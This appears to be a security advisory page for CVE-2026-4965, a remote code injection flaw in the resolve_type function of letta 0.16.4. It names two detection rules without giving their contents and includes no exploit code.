letta-ai letta 0.16.4 Remote Code Injection Vulnerability (CVE-2026-4965)
letta-ai letta version 0.16.4 contains a remote code injection vulnerability (CVE-2026-4965) in the resolve_type function of ast_parsers.py, stemming from improper neutralization of directives in dynamically evaluated code, allowing unauthenticated remote attackers to execute arbitrary code.
letta-ai letta version 0.16.4 is vulnerable to remote code injection due to improper neutralization of directives in dynamically evaluated code within the resolve_type function of letta/functions/ast_parsers.py. This vulnerability, identified as CVE-2026-4965, is a consequence of an incomplete fix for CVE-2025-6101. An unauthenticated, remote attacker can exploit this flaw by manipulating input to inject arbitrary code. The exploit is publicly available, increasing the risk of widespread…
Detection coverage 2
Detect Suspicious Process Spawned By Web Application
highDetects processes spawned by web applications that are not typically associated with normal operation, which may indicate code injection or command execution vulnerabilities.
Detect Web Server Request with Suspicious Parameters
mediumDetects web server requests to specific endpoints with parameters indicative of code injection attempts.
Detection queries are kept inside the platform. Get full rules →